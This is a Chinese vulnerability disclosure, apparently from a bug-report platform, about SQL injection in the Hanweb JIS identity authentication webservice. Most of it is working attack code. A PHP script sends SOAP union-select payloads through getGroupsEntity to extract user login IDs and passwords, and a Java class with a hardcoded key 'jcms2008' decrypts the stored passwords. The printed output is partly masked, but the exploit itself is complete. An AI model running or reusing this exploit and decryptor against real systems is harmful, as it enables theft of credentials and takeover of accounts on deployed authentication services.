### 简要描述:
我也拿大汉版通刷点WB吧。
大汉版通JIS统一身份认证系统存在SQL注射漏洞,可获取用户帐号密码等。
### 详细说明:
大汉版通JIS统一身份认证系统webservice的多个方法存在SQL注射漏洞,系统webservice路径~/jis/service:
[<img src="https://images.seebug.org/upload/201405/060618482185aa0d48136aa5559ff0cfe82beaa2.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/060618482185aa0d48136aa5559ff0cfe82beaa2.png)
例如validateLogin方法:
[<img src="https://images.seebug.org/upload/201405/06062022f342ac614d7a1f12dfdd7962cbe6d8fe.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/06062022f342ac614d7a1f12dfdd7962cbe6d8fe.png)
[<img src="https://images.seebug.org/upload/201405/06062036ae9a287203cdb55e47da39d7fdad5077.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/06062036ae9a287203cdb55e47da39d7fdad5077.png)
例如getAppURLById方法:
[<img src="https://images.seebug.org/upload/201405/060621022a171fe61a3a2f6636e9f897a20fbbd2.png" alt="7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/060621022a171fe61a3a2f6636e9f897a20fbbd2.png)
[<img src="https://images.seebug.org/upload/201405/060621165941541aa7a0ff623b3efc76d5f1aff1.png" alt="8.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/060621165941541aa7a0ff623b3efc76d5f1aff1.png)
### 漏洞证明:
用getGroupEntity操作测试:
```
<?php
/*
jis web service getGroupEntity method SQL injection
*/
function http_post($url, $data='', $cookie='') {
$headers = array('SOAPAction: ""',
'Content-Type: text/xml; charset=UTF-8');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$res = curl_exec($ch);
curl_close($ch);
return $res;
}
function getUserById($url, $n=1) {
$curl = $url."/service/serverAllMethod";
$loginids = "AAAAAAAAAAA";
for ($i=1; $i<=$n; $i++) {
$payload = "2' union all select c_id,vc_password,vc_loginid,NULL,NULL,NULL,NULL,NULL from merp_pub_user where vc_loginid not in('$loginids')--";
$data = "<soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:blf=\"http://blf.webservice.hanweb.com\">
<soapenv:Header/>
<soapenv:Body>
<blf:getGroupsEntity soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">
<userid xsi:type=\"xsd:string\">{$payload}</userid>
</blf:getGroupsEntity>
</soapenv:Body>
</soapenv:Envelope>";
$xml = http_post($curl, $data);
$patterns = array("/<vc_usergroupname xsi:type=\"xsd:string\">(.+)<\/vc_usergroupname>/",
"/<vc_usergroupspec xsi:type=\"xsd:string\">(.+)<\/vc_usergroupspec>/");
foreach($patterns as $pattern) {
preg_match($pattern, $xml, $matches[$i][]);
}
$loginid = $matches[$i][1][1];
$password = $matches[$i][0][1];
// $password = exec("java MD5 $password"); //解密
$loginids .= "','$loginid";
$loginid = substr_replace($loginid, "*****", 1); //马赛克
$password = substr_replace($password, "******", 4);
print("loginid:$loginid, password:$password\n");
}
}
if ($argc<2) {
print("php $argv[0] http://www.example.com/jis");
exit;
}
$url = $argv[1];
$count = isset($argv[2])?$argv[2]:5;
getUserById($url, $count);
?>
```
[<img src="https://images.seebug.org/upload/201405/06062509f942c8800da7785cc99e3f9e2aa896d3.png" alt="9.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/06062509f942c8800da7785cc99e3f9e2aa896d3.png)
加密解密功能在源码ldapmd51.2.jar包里,不可以上传附件有点忧伤,也贴上代码吧:
```
//javac -cp commons-codec-1.4.jar MD5.java
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.util.Random;
import org.apache.commons.codec.binary.Hex;
import sun.misc.BASE64Decoder;
import sun.misc.BASE64Encoder;
public class MD5
{
static final int S11 = 7;
static final int S12 = 12;
static final int S13 = 17;
static final int S14 = 22;
static final int S21 = 5;
static final int S22 = 9;
static final int S23 = 14;
static final int S24 = 20;
static final int S31 = 4;
static final int S32 = 11;
static final int S33 = 16;
static final int S34 = 23;
static final int S41 = 6;
static final int S42 = 10;
static final int S43 = 15;
static final int S44 = 21;
static final byte[] PADDING = { -128, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0 };
private long[] state = new long[4];
private long[] count = new long[2];
private byte[] buffer = new byte[64];
public String digestHexStr;
private byte[] digest = new byte[16];
public String getMD5ofStr(String inbuf)
{
md5Init();
md5Update(inbuf.getBytes(), inbuf.length());
md5Final();
this.digestHexStr = "";
for (int i = 0; i < 16; ++i) {
this.digestHexStr += byteHEX(this.digest[i]);
}
return this.digestHexStr;
}
public MD5()
{
md5Init();
}
private void md5Init()
{
this.count[0] = 0L;
this.count[1] = 0L;
this.state[0] = 1732584193L;
this.state[1] = 4023233417L;
this.state[2] = 2562383102L;
this.state[3] = 271733878L;
}
private long F(long x, long y, long z)
{
return (x & y | (x ^ 0xFFFFFFFF) & z);
}
private long G(long x, long y, long z) {
return (x & z | y & (z ^ 0xFFFFFFFF));
}
private long H(long x, long y, long z)
{
return (x ^ y ^ z);
}
private long I(long x, long y, long z) {
return (y ^ (x | z ^ 0xFFFFFFFF));
}
private long FF(long a, long b, long c, long d, long x, long s, long ac)
{
a += F(b, c, d) + x + ac;
a = (int)a << (int)s | (int)a >>> (int)(32L - s);
a += b;
return a;
}
private long GG(long a, long b, long c, long d, long x, long s, long ac) {
a += G(b, c, d) + x + ac;
a = (int)a << (int)s | (int)a >>> (int)(32L - s);
a += b;
return a;
}
private long HH(long a, long b, long c, long d, long x, long s, long ac) {
a += H(b, c, d) + x + ac;
a = (int)a << (int)s | (int)a >>> (int)(32L - s);
a += b;
return a;
}
private long II(long a, long b, long c, long d, long x, long s, long ac) {
a += I(b, c, d) + x + ac;
a = (int)a << (int)s | (int)a >>> (int)(32L - s);
a += b;
return a;
}
private void md5Update(byte[] inbuf, int inputLen)
{
byte[] block = new byte[64];
int index = (int)(this.count[0] >>> 3) & 0x3F;
if ((int)(this.count[0] += (inputLen << 3)) < inputLen << 3)
this.count[1] += 1L;
this.count[1] += (inputLen >>> 29);
int partLen = 64 - index;
int i=1;
if (inputLen >= partLen) {
md5Memcpy(this.buffer, inbuf, index, 0, partLen);
md5Transform(this.buffer);
for (i = partLen; i + 63 < inputLen; i += 64) {
md5Memcpy(block, inbuf, 0, i, 64);
md5Transform(block);
}
index = 0;
} else {
i = 0;
}
md5Memcpy(this.buffer, inbuf, index, i, inputLen - i);
}
private void md5Final()
{
byte[] bits = new byte[8];
Encode(bits, this.count, 8);
int index = (int)(this.count[0] >>> 3) & 0x3F;
int padLen = (index < 56) ? 56 - index : 120 - index;
md5Update(PADDING, padLen);
md5Update(bits, 8);
Encode(this.digest, this.state, 16);
}
private void md5Memcpy(byte[] output, byte[] input, int outpos, int inpos, int len)
{
for (int i = 0; i < len; ++i)
output[(outpos + i)] = input[(inpos + i)];
}
private void md5Transform(byte[] block)
{
long a = this.state[0]; long b = this.state[1]; long c = this.state[2]; long d = this.state[3];
long[] x = new long[16];
Decode(x, block, 64);
a = FF(a, b, c, d, x[0], 7L, 3614090360L);
d = FF(d, a, b, c, x[1], 12L, 3905402710L);
c = FF(c, d, a, b, x[2], 17L, 606105819L);
b = FF(b, c, d, a, x[3], 22L, 3250441966L);
a = FF(a, b, c, d, x[4], 7L, 4118548399L);
d = FF(d, a, b, c, x[5], 12L, 1200080426L);
c = FF(c, d, a, b, x[6], 17L, 2821735955L);
b = FF(b, c, d, a, x[7], 22L, 4249261313L);
a = FF(a, b, c, d, x[8], 7L, 1770035416L);
d = FF(d, a, b, c, x[9], 12L, 2336552879L);
c = FF(c, d, a, b, x[10], 17L, 4294925233L);
b = FF(b, c, d, a, x[11], 22L, 2304563134L);
a = FF(a, b, c, d, x[12], 7L, 1804603682L);
d = FF(d, a, b, c, x[13], 12L, 4254626195L);
c = FF(c, d, a, b, x[14], 17L, 2792965006L);
b = FF(b, c, d, a, x[15], 22L, 1236535329L);
a = GG(a, b, c, d, x[1], 5L, 4129170786L);
d = GG(d, a, b, c, x[6], 9L, 3225465664L);
c = GG(c, d, a, b, x[11], 14L, 643717713L);
b = GG(b, c, d, a, x[0], 20L, 3921069994L);
a = GG(a, b, c, d, x[5], 5L, 3593408605L);
d = GG(d, a, b, c, x[10], 9L, 38016083L);
c = GG(c, d, a, b, x[15], 14L, 3634488961L);
b = GG(b, c, d, a, x[4], 20L, 3889429448L);
a = GG(a, b, c, d, x[9], 5L, 568446438L);
d = GG(d, a, b, c, x[14], 9L, 3275163606L);
c = GG(c, d, a, b, x[3], 14L, 4107603335L);
b = GG(b, c, d, a, x[8], 20L, 1163531501L);
a = GG(a, b, c, d, x[13], 5L, 2850285829L);
d = GG(d, a, b, c, x[2], 9L, 4243563512L);
c = GG(c, d, a, b, x[7], 14L, 1735328473L);
b = GG(b, c, d, a, x[12], 20L, 2368359562L);
a = HH(a, b, c, d, x[5], 4L, 4294588738L);
d = HH(d, a, b, c, x[8], 11L, 2272392833L);
c = HH(c, d, a, b, x[11], 16L, 1839030562L);
b = HH(b, c, d, a, x[14], 23L, 4259657740L);
a = HH(a, b, c, d, x[1], 4L, 2763975236L);
d = HH(d, a, b, c, x[4], 11L, 1272893353L);
c = HH(c, d, a, b, x[7], 16L, 4139469664L);
b = HH(b, c, d, a, x[10], 23L, 3200236656L);
a = HH(a, b, c, d, x[13], 4L, 681279174L);
d = HH(d, a, b, c, x[0], 11L, 3936430074L);
c = HH(c, d, a, b, x[3], 16L, 3572445317L);
b = HH(b, c, d, a, x[6], 23L, 76029189L);
a = HH(a, b, c, d, x[9], 4L, 3654602809L);
d = HH(d, a, b, c, x[12], 11L, 3873151461L);
c = HH(c, d, a, b, x[15], 16L, 530742520L);
b = HH(b, c, d, a, x[2], 23L, 3299628645L);
a = II(a, b, c, d, x[0], 6L, 4096336452L);
d = II(d, a, b, c, x[7], 10L, 1126891415L);
c = II(c, d, a, b, x[14], 15L, 2878612391L);
b = II(b, c, d, a, x[5], 21L, 4237533241L);
a = II(a, b, c, d, x[12], 6L, 1700485571L);
d = II(d, a, b, c, x[3], 10L, 2399980690L);
c = II(c, d, a, b, x[10], 15L, 4293915773L);
b = II(b, c, d, a, x[1], 21L, 2240044497L);
a = II(a, b, c, d, x[8], 6L, 1873313359L);
d = II(d, a, b, c, x[15], 10L, 4264355552L);
c = II(c, d, a, b, x[6], 15L, 2734768916L);
b = II(b, c, d, a, x[13], 21L, 1309151649L);
a = II(a, b, c, d, x[4], 6L, 4149444226L);
d = II(d, a, b, c, x[11], 10L, 3174756917L);
c = II(c, d, a, b, x[2], 15L, 718787259L);
b = II(b, c, d, a, x[9], 21L, 3951481745L);
this.state[0] += a;
this.state[1] += b;
this.state[2] += c;
this.state[3] += d;
}
private void Encode(byte[] output, long[] input, int len)
{
int i = 0; for (int j = 0; j < len; j += 4) {
output[j] = (byte)(int)(input[i] & 0xFF);
output[(j + 1)] = (byte)(int)(input[i] >>> 8 & 0xFF);
output[(j + 2)] = (byte)(int)(input[i] >>> 16 & 0xFF);
output[(j + 3)] = (byte)(int)(input[i] >>> 24 & 0xFF);
++i;
}
}
private void Decode(long[] output, byte[] input, int len)
{
int i = 0; for (int j = 0; j < len; j += 4) {
output[i] =
(b2iu(input[j]) | b2iu(input[(j + 1)]) << 8 |
b2iu(input[(j + 2)]) << 16 | b2iu(input[(j + 3)]) << 24);
++i;
}
}
public static long b2iu(byte b)
{
return ((b < 0) ? b & 0xFF : b);
}
public static String byteHEX(byte ib)
{
char[] Digit = { '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A',
'B', 'C', 'D', 'E', 'F' };
char[] ob = new char[2];
ob[0] = Digit[(ib >>> 4 & 0xF)];
ob[1] = Digit[(ib & 0xF)];
String s = new String(ob);
return s;
}
public String getKeyEd(String Txt, String encrypt_key) {
if ((Txt.length() == 0) || (Txt == null)) {
Txt = "";
}
encrypt_key = getMD5ofStr(encrypt_key);
int m = 0;
int n = encrypt_key.length();
StringBuffer temp = new StringBuffer();
for (int i = 0; i < Txt.length(); ++i) {
if (m == n) {
m = 0;
}
char cc1 = encrypt_key.charAt(m);
int cc4 = cc1 ^ Txt.charAt(i);
char cc2 = (char)cc4;
temp.append(cc2);
++m;
}
return String.valueOf(temp.toString());
}
public String encrypt(String Txt, String Key1)
{
int number = getRandom();
String encrypt_key = getMD5ofStr(Integer.toString(number));
int ctr = 0;
int num = Txt.length();
int num1 = encrypt_key.length();
Txt = Txt.trim();
StringBuffer temp = new StringBuffer();
for (int i = 0; i < num; ++i)
{
if (ctr == num1)
ctr = 0;
char cc1 = encrypt_key.charAt(ctr);
temp.append(cc1);
char cc2 = Txt.charAt(i);
int cc4 = cc1 ^ cc2;
char cc3 = (char)cc4;
temp.append(cc3);
++ctr;
}
String er = temp.toString();
String retur = getKeyEd(er, Key1);
retur = setFromBASE64(retur);
return retur;
}
public String decrypt(String Txt, String Key1)
{
Txt = getFromBASE64(Txt);
Txt = getKeyEd(Txt, Key1);
StringBuffer temp = new StringBuffer();
char temp1 = '\0';
for (int i = 0; i < Txt.length(); ++i) {
temp1 = Txt.charAt(i);
++i;
char cc1 = Txt.charAt(i);
int cc2 = cc1 ^ temp1;
char cc3 = (char)cc2;
temp = temp.append(cc3);
}
Txt = temp.toString();
return Txt;
}
public String encryptMB(String Txt, String Key1)
{
int num = Txt.length();
if (num > 0) {
Txt = setFromBASE64(Txt);
}
Txt = encrypt(Txt, Key1);
return Txt;
}
public String decryptMB(String Txt, String Key1)
{
String s = decrypt(Txt, Key1);
s = getFromBASE64(s);
return s;
}
public String getFromBASE64(String s)
{
if ((s == null) || (s.length() <= 0))
return "";
BASE64Decoder decoder = new BASE64Decoder();
try {
byte[] b = decoder.decodeBuffer(s);
return new String(b); } catch (Exception e) {
}
return "";
}
public String setFromBASE64(String s)
{
if ((s == null) || (s.length() <= 0))
return "";
BASE64Encoder encoder = new BASE64Encoder();
try {
String b = encoder.encode(s.getBytes());
return b; } catch (Exception e) {
}
return "";
}
public String getDecTxtChange(String Txt)
{
int n = Txt.length();
int num = 0;
String tem1 = "";
String tem2 = "";
if (n % 2 == 0)
num = n / 2;
else {
num = (n + 1) / 2;
}
tem1 = Txt.substring(0, num);
tem2 = Txt.substring(num, n);
StringBuffer temp1 = new StringBuffer(tem1);
StringBuffer temp2 = new StringBuffer(tem2);
StringBuffer temp3 = new StringBuffer();
temp1 = temp1.reverse();
temp2 = temp2.reverse();
for (int i = 0; i < num; ++i)
{
char tem = decAscChange(temp1.charAt(i));
temp3.append(tem);
char temm;
if (n % 2 == 0) {
temm = decAscChange(temp2.charAt(i));
temp3.append(temm);
}
else if (i < num - 1) {
temm = decAscChange(temp2.charAt(i));
temp3.append(temm);
}
}
return temp3.toString();
}
public char decAscChange(char ib)
{
int num = ib;
String num1 = Integer.toBinaryString(num);
StringBuffer temp1 = new StringBuffer();
String ll = "";
int n = num1.length();
int k = 8 - n;
if (k > 0) {
for (int i = 0; i < k; ++i) {
temp1 = temp1.append("0");
}
}
ll = temp1.toString();
ll = ll + num1;
StringBuffer temp7 = new StringBuffer();
for (int i = 0; i < 4; ++i) {
temp7 = temp7.append(ll.charAt(2 * i));
}
for (int i = 4; i > 0; --i) {
temp7 = temp7.append(ll.charAt(2 * i - 1));
}
String lll = temp7.toString();
char[] er = lll.toCharArray();
int sum = 7;
int sum1 = 0;
for (int j = 0; j < 8; ++j) {
char k1 = er[j];
int k7 = k1;
if (k7 == 49) {
double num12 = Math.pow(2.0D, sum);
sum1 += (int)num12;
}
--sum;
}
char k22 = (char)sum1;
return k22;
}
public String getTxtChang(String Txt) {
StringBuffer temp1 = new StringBuffer();
StringBuffer temp2 = new StringBuffer();
for (int i = 0; i < Txt.length(); ++i) {
if (i % 2 == 0) {
char tem = getByteDEX(Txt.charAt(i));
temp1 = temp1.append(tem);
} else {
char tem1 = getByteDEX(Txt.charAt(i));
temp2 = temp2.append(tem1);
}
}
temp1 = temp1.reverse();
temp2 = temp2.reverse();
temp1.append(temp2);
return String.valueOf(temp1.toString());
}
public char getByteDEX(char ib)
{
int num = ib;
String num1 = Integer.toBinaryString(num);
StringBuffer temp1 = new StringBuffer();
int n = num1.length();
int k = 8 - n;
String ll = "";
if (k > 0) {
for (int i = 0; i < k; ++i) {
temp1 = temp1.append("0");
}
ll = temp1.toString();
ll = ll + num1;
}
StringBuffer temp7 = new StringBuffer();
k = 7;
for (int i = 0; i < 4; ++i) {
temp7 = temp7.append(ll.charAt(i));
temp7 = temp7.append(ll.charAt(k--));
}
String lll = temp7.toString();
char[] er = lll.toCharArray();
int sum = 7;
int sum1 = 0;
for (int j = 0; j < 8; ++j) {
char k1 = er[j];
int k7 = k1;
if (k7 == 49) {
double num12 = Math.pow(2.0D, sum);
sum1 += (int)num12;
}
--sum;
}
char k22 = (char)sum1;
return k22;
}
public int getRandom() {
Random generator = new Random();
int limit = 320000;
int randomNub = 1;
boolean j = true;
while (j) {
randomNub = (int)(generator.nextDouble() * limit);
if (randomNub > 10)
j = false;
}
return randomNub;
}
public static String encodeByJavaSecurity(String str)
{
try
{
MessageDigest messageDigest = MessageDigest.getInstance("MD5");
byte[] digest = messageDigest.digest(str.getBytes());
return new String(
Hex.encodeHex(digest));
} catch (NoSuchAlgorithmException e) {
e.printStackTrace();
}
return str;
}
public static void main(String[] args)
{
MD5 md5 = new MD5();
System.out.println(md5.decrypt(args[0], "jcms2008"));
}
}
```
暂无评论